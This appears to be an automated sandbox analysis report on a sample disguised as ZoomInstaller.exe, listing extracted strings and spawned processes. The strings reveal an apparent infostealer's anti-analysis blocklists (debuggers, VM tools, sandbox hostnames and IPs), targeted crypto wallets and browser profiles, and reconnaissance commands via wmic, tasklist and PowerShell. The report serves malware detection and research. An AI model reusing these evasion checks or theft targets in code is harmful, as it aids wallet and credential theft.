Source: ZoomInstaller.exe Binary or memory string: MOREBUF={PC:: NO FRAME (SP=RUNTIME: FRAME TS SET IN TIMERTRACEBACK STUCKADVERTISE ERRORKEY HAS EXPIREDNETWORK IS DOWNNO MEDIUM FOUNDNO SUCH PROCESSGETADAPTERSINFOCREATEHARDLINKWDEVICEIOCONTROLFLUSHVIEWOFFILEGETCOMMANDLINEWGETSTARTUPINFOWPROCESS32FIRSTWUNMAPVIEWOFFILEFAILED TO LOAD FAILED TO FIND : CANNOT PARSE ,M3.2.0,M11.1.0476837158203125IMPERSONATESELFOPENTHREADTOKENINVALID ARGSIZE<INVALID VALUE>REFLECTLITE.SETEXCLUDECLIPRECTGETENHMETAFILEWGETTEXTMETRICSWPLAYENHMETAFILEGDIPLUSSHUTDOWNGETTHREADLOCALEOLEUNINITIALIZEWGLGETCURRENTDCDRAGACCEPTFILESCALLWINDOWPROCWCREATEPOPUPMENUCREATEWINDOWEXWDIALOGBOXPARAMWGETACTIVEWINDOWGETDPIFORWINDOWGETRAWINPUTDATAINSERTMENUITEMWISWINDOWENABLEDISWINDOWVISIBLEPOSTQUITMESSAGESETACTIVEWINDOWSETWINEVENTHOOKTRACKMOUSEEVENTWINDOWFROMPOINTDRAWTHEMETEXTEXACCEPT-LANGUAGEX-FORWARDED-FOR()<>@,;:\"/[]?=INVALID POINTERX509KEYPAIRLEAFRECORD OVERFLOWBAD CERTIFICATEPKCS1WITHSHA256PKCS1WITHSHA384PKCS1WITHSHA512CLIENTAUTHTYPE(UNKNOWN VERSIONJSTMPLLITINTERPTARINSECUREPATHX509USEPOLICIESREGCREATEKEYEXWREGDELETEVALUEW IS UNAVAILABLEGETSECURITYINFOSETSECURITYINFOADDDLLDIRECTORYFINDNEXTVOLUMEWFINDVOLUMECLOSEGETCOMMTIMEOUTSISWOW64PROCESS2QUERYDOSDEVICEWSETCOMMTIMEOUTSSETVOLUMELABELWRTLDEFAULTNPACLCLSIDFROMSTRINGSTRINGFROMGUID2ISWINDOWUNICODETIMEBEGINPERIOD0601021504Z0700INVALID BOOLEANNON-MINIMAL TAGUNKNOWN GO TYPEAVX512VPOPCNTDQHTTP TOOLKIT.EXEJOEBOXSERVER.EXE0123456789ABCDEFREAD AFTER CLOSEAFTER OBJECT KEYGETDESKTOPWINDOW2006-01-02 15:042006-01-02T15:04STRING TOO LARGE_WRITABLE_SCHEMAAUTH_USER_CHANGEAUTH_USER_DELETEDIVISION BY ZERO()<>@,;:\"/[]?= HOSTLOOKUPORDER=/ETC/RESOLV.CONFNON-IPV4 ADDRESSNON-IPV6 ADDRESSUNKNOWN NETWORK NO COLON ON LINESETTINGS_TIMEOUTFRAME_SIZE_ERRORCONTENT-ENCODINGCONTENT-ENCODINGCONTENT-LANGUAGECONTENT-LOCATIONWWW-AUTHENTICATEPROXY-CONNECTIONREAD_FRAME_OTHER%S %S HTTP/1.1
Source: ZoomInstaller.exe Binary or memory string: HANDSHAKEMATH/RANDWINMM.DLLPURGECOMMSETUPCOMMINFO_HASHQ9IATRKPRHQARZHRDBPJD1BNJKFVLHPXMDUOPVYXX64DBG.EXEX96DBG.EXEVMSRVC.EXEX32DBG.EXEPRL_CC.EXECHROME.EXEMSEDGE.EXEMOTDEPASSEPASSPHRASESAUVEGARDEMATHWALLETEVERWALLETPETRAAPTOSFEWCHAMOVEPALIWALLETMETAMASK_EMETAMASK_O FOR TYPE USER32.DLL2006-01-02_AUTH_USER_AUTH_PASS_AUTH_SALTIMPOSSIBLE
Source: ZoomInstaller.exe Binary or memory string: INVALID EXCHANGENO ROUTE TO HOSTINVALID ARGUMENTMESSAGE TOO LONGOBJECT IS REMOTEREMOTE I/O ERRORSETFILEPOINTEREXOPENPROCESSTOKENREGQUERYINFOKEYWREGQUERYVALUEEXWDNSNAMECOMPARE_WCREATEDIRECTORYWFLUSHFILEBUFFERSGETCOMPUTERNAMEWGETFULLPATHNAMEWGETLONGPATHNAMEWREMOVEDIRECTORYWNETAPIBUFFERFREETIME: BAD [0-9]*2384185791015625GODEBUG: VALUE "DUPLICATETOKENEXGETCURRENTTHREADRTLVIRTUALUNWIND: VALUE OF TYPE CONTEXT CANCELEDIMAGELIST_CREATEIMAGELIST_DRAWEXGETOPENFILENAMEWGETSAVEFILENAMEWCLOSEENHMETAFILECOPYENHMETAFILEWCREATEDIBSECTIONGETVIEWPORTORGEXSETVIEWPORTORGEXGDIPDISPOSEIMAGEGETCONSOLETITLEWGETCONSOLEWINDOWGETMODULEHANDLEWGETNUMBERFORMATWCOCREATEINSTANCECOGETCLASSOBJECTWGLCREATECONTEXTWGLDELETECONTEXTPDHVALIDATEPATHWADJUSTWINDOWRECTBRINGWINDOWTOTOPDISPATCHMESSAGEWENUMCHILDWINDOWSGETCLIPBOARDDATAGETMENUITEMCOUNTGETMENUITEMINFOWGETSYSCOLORBRUSHGETSYSTEMMETRICSISDIALOGMESSAGEWUNREGISTERCLASSWREGISTERCLASSEXWSETCLIPBOARDDATASETMENUITEMINFOWTRACKPOPUPMENUEXTRANSLATEMESSAGEGETTHEMEPARTSIZECONTENT-LANGUAGEINVALID DNS NAMERCODEFORMATERRORUNPACKING HEADERNO RENEGOTIATIONSIGNATURESCHEME(INVALID ENCODINGSETENTRIESINACLWSETSERVICESTATUSCRYPTPROTECTDATACRYPTQUERYOBJECTCONNECTNAMEDPIPECREATEJOBOBJECTWCREATENAMEDPIPEWDEFINEDOSDEVICEWFINDFIRSTVOLUMEWGETLOGICALDRIVESGETNAMEDPIPEINFOGETPRIORITYCLASSSETDLLDIRECTORYWSETFILEVALIDDATASETPRIORITYCLASSVIRTUALPROTECTEXRTLGETCURRENTPEBGETGUITHREADINFOWINVERIFYTRUSTEXLENGTH TOO LARGEAVX512VPCLMULQDQFIDDLER.WEBUI.EXEVGAUTHSERVICE.EXEPROCESSHACKER.EXEJOEBOXCONTROL.EXEWRITE AFTER CLOSEREFLECT.VALUE.INTIN STRING LITERAL0123456789ABCDEFX0123456789ABCDEFX%%!%C(BIG.INT=%S)MULTIPARTMAXPARTSMESSAGE TOO LARGEINVALID STREAM IDTRANSFER-ENCODINGHEADER_TABLE_SIZECOMPRESSION_ERRORENHANCE_YOUR_CALMHTTP_1_1_REQUIREDIF-MODIFIED-SINCEFRAME_PING_LENGTHTRUNCATED HEADERSIF-MODIFIED-SINCETRANSFER-ENCODINGX-FORWARDED-PROTOX-IDEMPOTENCY-KEYMOVED PERMANENTLYFAILED DEPENDENCYTOO MANY REQUESTSWINREADLINKVOLUMEEXEC: KILLING 
CMDEXEC: NOT STARTEDGOROUTINE PROFILEALLTHREADSSYSCALLGC ASSIST MARKINGSELECT (NO CASES)SYNC.RWMUTEX.LOCKWAIT FOR GC CYCLETRACE PROC STATUSSYNC.(*COND).WAIT: MISSING METHOD NOTETSLEEPG ON G0BAD TINYSIZECLASSKEY ALIGN TOO BIGRUNTIME: POINTER G ALREADY SCANNEDMARK - BAD STATUSSCANOBJECT N == 0SWEPT CACHED SPANMARKBITS OVERFLOWRUNTIME: SUMMARY[RUNTIME: LEVEL = , P.SEARCHADDR = RTLGETCURRENTPEBRUNTIME.NEWOSPROCRUNTIME/INTERNAL/THREAD EXHAUSTIONLOCKED M0 WOKE UPENTERSYSCALLBLOCK SPINNINGTHREADS=GP.WAITING != NILUNKNOWN CALLER PCSTACK: FRAME={SP:RUNTIME: NAMEOFF RUNTIME: TYPEOFF RUNTIME: TEXTOFF PERMISSION DENIEDWRONG MEDIUM TYPENO DATA AVAILABLEEXEC FORMAT ERRORLOOKUPACCOUNTSIDWDNSRECORDLISTFREEGETCURRENTPROCESSGETSHORTPATHNAMEWWSAENUMPROTOCOLSWGTB STANDARD TIMEFLE STANDARD TIMEGMT STANDARD TIMECORRUPT ZIP FILE FRACTIONAL SECONDINDEX > WINDOWEND1192092895507812559604644775390625INVALID BIT SIZE UNKNOWN TYPE KIND HAS INVALID NAMEREFLECT: CALL OF REFLECT.VALUE.LENREFLECT: NEW(NIL)IMAGELIST_DESTROYCHOOSEPIXELFORMATDELETEENHMETAFILEINTERSECTCLIPR
Source: ZoomInstaller.exe Binary or memory string: RUNQUEUE= STOPWAIT= RUNQSIZE= GFREECNT= THROWING= SPINNING=ATOMICAND8FLOAT64NANFLOAT32NANEXCEPTION PTRSIZE= TARGETPC= UNTIL PC=UNKNOWN PCRUNTIME: GGOROUTINE TERMINATEDOWNER DIEDDNSQUERY_WGETIFENTRYCANCELIOEXCREATEPIPEGETVERSIONWSACLEANUPWSASTARTUPGETSOCKOPTDNSAPI.DLLWS2_32.DLL%!WEEKDAY(SHORT READ12207031256103515625PARSEFLOATLOCKFILEEXWSASOCKETWCOMPLEX128T.KIND == COMBINERGNGETBKCOLORGETOBJECTWSETBKCOLORSTRETCHBLTALPHABLENDGLOBALFREEGLOBALLOCKDRAGFINISHBEGINPAINTCREATEMENUDELETEMENUDRAWICONEXGETDLGITEMGETSUBMENULOADIMAGEWMOVEWINDOWREMOVEMENUSETCAPTURESHOWWINDOWCONTENT-IDMESSAGE-IDPARSEADDR(INVALID IPCLASSCSNETCLASSCHAOSADDITIONALSKIPPING: RES BINDERRES MASTERRESUMPTIONEXP MASTERHTTP_PROXYHTTP_PROXYHTTP2DEBUGCRYPTO/TLSRIPEMD-160DWMAPI.DLLISVALIDSIDLOCALALLOCOPENEVENTWOPENMUTEXWOPENTHREADPULSEEVENTRESETEVENTSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1BASE_NONCEPOSTALCODEAVX512IFMAAVX512VBMIAVX512VNNIAVX512GFNIAVX512VAESAVX512BF1678.139.8.5095.25.81.2435.199.6.1380.211.0.9734.105.0.27FV-AZ269-80ARCHIBALDPCRUNNERADMINAAYRAP7XFUOWATCHER.EXEMITMWEB.EXECHARLES.EXEPOSTMAN.EXEFIDDLER.EXEOLLYDBG.EXEFIDDLER.EXEREGEDIT.EXETASKMGR.EXEVMUSRVC.EXEDF5SERV.EXEQEMU-GA.EXEOLLYDBG.EXEDISCORD.EXEUSER_DATA#2USER_DATA#3USER_DATA#4USER_DATA#5IDENTIFIANTYOROIWALLETKARDIACHAINNIFTYWALLETBRAVEWALLETEQUALWALLETGUILDWALLETMARSHALJSONMARSHALTEXTUNREACHABLE_AUTH_CRYPT_QUERY_ONLY_CACHE_SIZESHORT WRITESUBMISSIONSNIL CONTEXTI/O TIMEOUTHTTP2SERVERHTTP2CLIENTENABLE_PUSHEND_HEADERS/INDEX.HTML ERRCODE=%V, SETTINGS:RETRY-AFTERTTL EXPIREDEARLY HINTSBAD REQUESTBAD GATEWAY/DEV/STDOUT/DEV/STDERROPENPROCESSGETFILETYPE BYTES ...
Source: ZoomInstaller.exe Binary or memory string: RUNTIME: SP=ABI MISMATCHWRONG TIMERSINVALID SLOTHOST IS DOWNILLEGAL SEEKGETLENGTHSIDGETLASTERRORGETSTDHANDLEGETTEMPPATHWLOADLIBRARYWREADCONSOLEWSETENDOFFILETRANSMITFILEGETADDRINFOWADVAPI32.DLLIPHLPAPI.DLLKERNEL32.DLLNETAPI32.DLL152587890625762939453125OPENSERVICEWREVERTTOSELFCREATEEVENTWGETCONSOLECPUNLOCKFILEEXVIRTUALQUERY HAS NO NAME HAS NO TYPEREFLECT.COPYCOMCTL32.DLLCOMDLG32.DLLCHOOSECOLORWCREATEBITMAPDELETEOBJECTEXTCREATEPENGETTEXTCOLORSELECTOBJECTSETTEXTCOLORGRADIENTFILLGLOBALUNLOCKLOADRESOURCELOCKRESOURCESETLASTERROROLEAUT32.DLLSYSSTRINGLENOPENGL32.DLLPDHOPENQUERYEXTRACTICONWENABLEWINDOWGETCURSORPOSPEEKMESSAGEWPOSTMESSAGEWREDRAWWINDOWSENDMESSAGEWSETCURSORPOSSETWINDOWPOSUPDATEWINDOWWINDOWFROMDCWINSPOOL.DRVRANDAUTOSEEDMIME-VERSIONX-IMFORWARDSX-POWERED-BYCONTENT TYPERCODESUCCESSRCODEREFUSEDNOT POLLABLETLSUNSAFEEKMCLOSE NOTIFYREMOTE ERRORC HS TRAFFICS HS TRAFFICC AP TRAFFICS AP TRAFFIC (SENSITIVE)GOTYPESALIASCFGMGR32.DLLSETUPAPI.DLLWINTRUST.DLLWTSAPI32.DLLREPORTEVENTWCREATEMUTEXWGETCOMMSTATEGETPROCESSIDRELEASEMUTEXRESUMETHREADSETCOMMBREAKSETCOMMSTATESETERRORMODESETSTDHANDLETHREAD32NEXTVIRTUALALLOCNTCREATEFILECOCREATEGUIDECDSA-SHA256ECDSA-SHA384ECDSA-SHA512CALLER ERRORSERIALNUMBERAVX5124FMAPSAVX512BITALG88.132.231.7152.251.116.35194.154.78.6920.99.160.173195.74.76.22234.105.183.6892.211.55.19979.104.209.3334.145.89.174109.74.154.90195.239.51.59192.40.57.23464.124.12.16234.142.74.220109.74.154.9134.105.72.241109.74.154.92213.33.142.5093.216.75.209192.87.28.10334.85.253.17023.128.248.4635.229.69.22734.141.245.2534.85.243.24187.166.50.21334.145.195.5835.192.93.10784.147.54.113W0FJUOVMCCP5AMITMPROXY.EXEWIRESHARK.EXEWIRESHARK.EXEPRL_TOOLS.EXEFILEZILLA.EXEENCRYPTED_KEYGUEST PROFILEBRAVE DEFAULTOPERA DEFAULTBLISK DEFAULTAUTHENTICATORHARMONYWALLET_BUSY_TIMEOUT_FOREIGN_KEYS_JOURNAL_MODE_LOCKING_MODEAUTH_USER_ADDLAME 
REFERRALSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATEAUTHORIZATIONCACHE-CONTROLLAST-MODIFIEDACCEPT-RANGESIF-NONE-MATCH[FRAMEHEADER INVALID BASE ACCEPT-RANGESAUTHORIZATIONCACHE-CONTROLCONTENT-RANGEIF-NONE-MATCHLAST-MODIFIEDFQDN TOO LONGSOCKS CONNECTRESET CONTENTLOOP DETECTEDFIELD NAME %Q IN HOST NAMEFINDFIRSTFILEWAKEABLESLEEPPROFMEMACTIVEPROFMEMFUTURETRACESTACKTABEXECRINTERNALTESTRINTERNALGC SWEEP WAITOUT OF MEMORY IS NIL, NOT VALUE METHOD BAD MAP STATE SPAN.BASE()=BAD FLUSHGEN , NOT POINTER != SWEEPGEN MB GLOBALS, WORK.NPROC= WORK.NWAIT= NSTACKROOTS= FLUSHEDWORK DOUBLE UNLOCK S.SPANCLASS= MB) WORKERS=MIN TOO LARGE-BYTE BLOCK (RUNTIME: VAL=RUNTIME: SEQ=FATAL ERROR: IDLETHREADS= SYSCALLTICK=LOAD64 FAILEDXADD64 FAILEDXCHG64 FAILEDNIL STACKBASE}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (8 identical entries) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3528 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1768 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3611 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 940 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3534 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1336 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3030 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1415 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep count: 3611 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep count: 940 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6016 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (8 identical entries) Jump to behavior
Source: ZoomInstaller.exe Binary or memory string: sched={pc:, gp->status= pluginpath= : unknown pc called from runtime: pid=level 3 resetsrmount errortimer expiredexchange fullRegEnumKeyExWRegOpenKeyExWCertOpenStoreFindNextFileWMapViewOfFileVirtualUnlockWriteConsoleWFreeAddrInfoWgethostbynamegetservbynameparsing time out of range is too largenot availabledalTLDpSugct?3814697265625GetTempPath2WModule32NextWRtlGetVersionRegEnumValueWImageList_AddCreateRectRgnGetDeviceCapsSetBrushOrgExCreateActCtxWFindResourceWRtlMoveMemoryCoTaskMemFreeOleInitializeSysFreeStringwglShareListsPdhCloseQueryShellExecuteWAnimateWindowDestroyWindowDrawFocusRectGetClassNameWGetClientRectGetMenuItemIDGetScrollInfoGetSystemMenuGetWindowRectOpenClipboardSetScrollInfoGetThemeColorOpenThemeDataEnumPrintersWname too longtlsmaxrsasizeaccess denieduser canceledPKCS1WithSHA1ECDSAWithSHA1CLIENT_RANDOMgzip, deflategocacheverifyinstallgoroothtml/templateRegDeleteKeyWDeleteServiceStartServiceWGetDriveTypeWThread32FirstWaitCommEventRtlInitStringEnumProcessesExitWindowsExtimeEndPeriodWTSFreeMemoryinvalid ASN.1SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSemail addressshared_secretempty integerunsupported: 181.214.153.11194.154.78.137213.33.190.21988.153.199.169194.154.78.16092.211.109.160188.105.91.11634.141.146.114188.105.91.173193.128.114.4588.132.227.23888.132.226.20388.132.225.10092.211.192.144192.211.110.74188.105.91.143178.239.165.7034.253.248.228tVaUeNrRraoKwaVMware SVGA 3Dvmwareuser.exexenservice.exevmwaretray.exeChrome DefaultYandex DefaultCocCoc Defaultis a directory_secure_deleteunexpected EOFinternal errorgetprotobynameunknown mode: Content-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eofunknown error unknown code: Not AcceptableComputerNameEx
Source: ZoomInstaller.exe Binary or memory string: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptdnsapi.dllws2_32.dll%!Weekday(short read12207031256103515625ParseFloatLockFileExWSASocketWcomplex128t.Kind == CombineRgnGetBkColorGetObjectWSetBkColorStretchBltAlphaBlendGlobalFreeGlobalLockDragFinishBeginPaintCreateMenuDeleteMenuDrawIconExGetDlgItemGetSubMenuLoadImageWMoveWindowRemoveMenuSetCaptureShowWindowContent-IdMessage-IdParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: res binderres masterresumptionexp masterHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsRIPEMD-160dwmapi.dllIsValidSidLocalAllocOpenEventWOpenMutexWOpenThreadPulseEventResetEventSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_noncePOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf1678.139.8.5095.25.81.2435.199.6.1380.211.0.9734.105.0.27fv-az269-80ARCHIBALDPCrunneradminaAYRAp7xfuowatcher.exemitmweb.exeCharles.exePostman.exeFiddler.exeOllyDbg.exefiddler.exeregedit.exetaskmgr.exevmusrvc.exedf5serv.exeqemu-ga.exeollydbg.exediscord.exeuser_data#2user_data#3user_data#4user_data#5identifiantYoroiWalletKardiaChainNiftyWalletBraveWalletEqualWalletGuildWalletMarshalJSONMarshalTextunreachable_auth_crypt_query_only_cache_sizeshort writesubmissionsnil contexti/o timeouthttp2serverhttp2clientENABLE_PUSHEND_HEADERS/index.html ErrCode=%v, settings:retry-afterTTL expiredEarly HintsBad RequestBad Gateway/dev/stdout/dev/stderrOpenProcessGetFileType bytes ...
Source: ZoomInstaller.exe Binary or memory string: SYSTEMROOT=assistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailunspecifiedcgocall nil s.nelems= of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by broken pipealarm clockbad messagefile existsbad addressRegCloseKeyCloseHandleCreateFileWDeleteFileWExitProcessFreeLibrarySetFileTimeVirtualLockWSARecvFromclosesocketgetpeernamegetsocknamecrypt32.dllmswsock.dllsecur32.dllshell32.dlluserenv.dlltime: file 30517578125ProcessPrngMoveFileExWNetShareAddNetShareDelbad argSizemethodargs(reflect.Set.WithCancel.WithValue(PrintDlgExWmsimg32.dllSwapBuffersgdiplus.dllGlobalAllocDestroyIconDestroyMenuDrawMenuBarDrawTextExWFindWindowWGetAncestorGetCaretPosGetIconInfoGetKeyStateGetMenuInfoGetMessageWGetSysColorLoadCursorWLoadStringWMessageBeepMessageBoxWSetMenuInfouxtheme.dllIsAppThemedIn-Reply-ToReturn-PathClassHESIODauthoritiesadditionalstls10servertls: alert(local errorc e traffictraffic updApplicationHTTPS_PROXYhttps_proxygocachehashgocachetestarchive/tarcrypto/x509archive/zipSHA-512/224SHA-512/256BLAKE2s-256BLAKE2b-256BLAKE2b-384BLAKE2b-512sechost.dllversion.dllGetFileTimeSetCommMaskVirtualFreeNetUserEnumCoGetObjectEnumWindowsToUnicodeExinvalid oidpsk_id_hashavx512vnniwavx512vbmi284.147.62.1295.25.204.9092.211.52.6234.138.96.2334.83.46.13035.237.47.12195.239.51.3AppOnFly-VPSPeter WilsonFX7767MOR6Q6RDhJ0CNFevzX8Nl0ColNQ5bqPqONjHVwexsSmitmdump.exeInsomnia.exeKsDumper.exevmacthlp.exevboxtray.exevmtoolsd.exeksdumper.exepestudio.exeTelegram.exemot_de_passeidentifiantsEdge DefaultBinanceChainGuardaWalletJaxxxLibertyTerraStationMartianAptosBitAppWalletAtomicWalletSaturnWalletTempleWalletwith name 
%q_auto_vacuum_synchronoussqlite_cryptauthenticateauth_enabledshort bufferinvalid baseContent-Typemultipathtcp127.0.0.1:53no such hostunknown portCIDR addressinvalid portgetaddrinfowcan't happentransmitfilehttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2out of range100-continuerecv_goaway_Multi-StatusNot ModifiedUnauthorizedI'm a teapotNot Extendedproxyconnectexit status sweepWaiterstraceStringsspanSetSpinemspanSpecialtraceTypeTabgcBitsArenasmheapSpecialgcpacertraceharddecommitmadvdontneeddumping heapchan receivelfstack.push span.limit= span.state=bad flushGen MB stacks, worker mode nDataRoots= nSpanRoots= wbuf1=<nil> wbuf2=<nil> gcscandone runtime: gp= found at *( s.elemsize= B (
Source: ZoomInstaller.exe Binary or memory string: Handshakemath/randwinmm.dllPurgeCommSetupComminfo_hashQ9IATRKPRHQarZhrdBpjd1bnJkfVlHPxmdUOpVyxx64dbg.exex96dbg.exevmsrvc.exex32dbg.exeprl_cc.exechrome.exemsedge.exemotdepassepassphrasesauvegardeMathWalletEVERWalletPetraAptosFewchaMovePaliWalletMetamask_EMetaMask_O for type user32.dll2006-01-02_auth_user_auth_pass_auth_saltimpossible
Source: ZoomInstaller.exe Binary or memory string: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConsoleModeGetProcAddressProcess32NextWSetFilePointerNetUserGetInfoGetUserNameExWTranslateNameW procedure in winapi error #: extra text: invalid syntax1907348632812595367431640625OpenSCManagerWModule32FirstWunsafe.Pointer on zero Valueunknown method.WithoutCancel.WithDeadline(RegSetValueExWLoadIconMetricGetStockObjectSetPixelFormatTransparentBltGdiplusStartupActivateActCtxGetLocaleInfoWSizeofResourceCoInitializeExCoUninitializeSysAllocStringwglCopyContextwglMakeCurrentPdhAddCounterWDragQueryFileWSHGetFileInfoWClientToScreenCloseClipboardDeferWindowPosDefWindowProcWEmptyClipboardEnableMenuItemGetWindowLongWInvalidateRectNotifyWinEventReleaseCaptureScreenToClientSetWindowLongWTrackPopupMenuUnhookWinEventCloseThemeDataSetWindowThemeAccept-CharsetDkim-SignatureRCodeNameErrorResourceHeaderunreachable: bad record MACneed more dataREQUEST_METHODmime/multipartControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWSetConsoleModeVirtualProtectVirtualQueryExGetShellWindowVerQueryValueWdata truncated169.150.197.118212.119.227.165109.145.173.169212.119.227.151195.181.175.105193.225.193.201212.119.227.167BEE7370C-8C0C-4DESKTOP-Z7LUJHJDESKTOP-0HHYPKQDESKTOP-TUAHF5IDESKTOP-NAKFFMTWIN-5E07COS9ALRB30F0242-1C6A-4DESKTOP-VRSQLAGDESKTOP-D019GDMDESKTOP-WI8CLETDESKTOP-B0T93D6DESKTOP-1PYKP29DESKTOP-1Y2433R6C4E733F-C2D9-4DESKTOP-WG3MYJSDESKTOP-7XC6GEZDESKTOP-5OV9S0OBinaryNinja.exevboxservice.exeUnknown versionVivaldi 
DefaultLiqualityWalletMaiarDeFiWalletAuthenticator_EzipinsecurepathGetMonitorInfoWBEGIN IMMEDIATEBEGIN EXCLUSIVEmissing address/etc/mdns.allowunknown networknegative updateaccept-encodingaccept-languagex-forwarded-forAccept-Encodingrecv_rststream_Idempotency-KeyPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keywrite error: %wGetProcessTimesDuplicateHandleallocmRInternalGC (fractional)write heap dumpasyncpreemptoffforce gc (idle)sync.Mutex.Lockruntime.Goschedmalloc deadlockruntime error: elem size wrong with GC prog
Source: ZoomInstaller.exe, 00000000.00000002.1983594822.00000297456FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get caption
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Version
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist
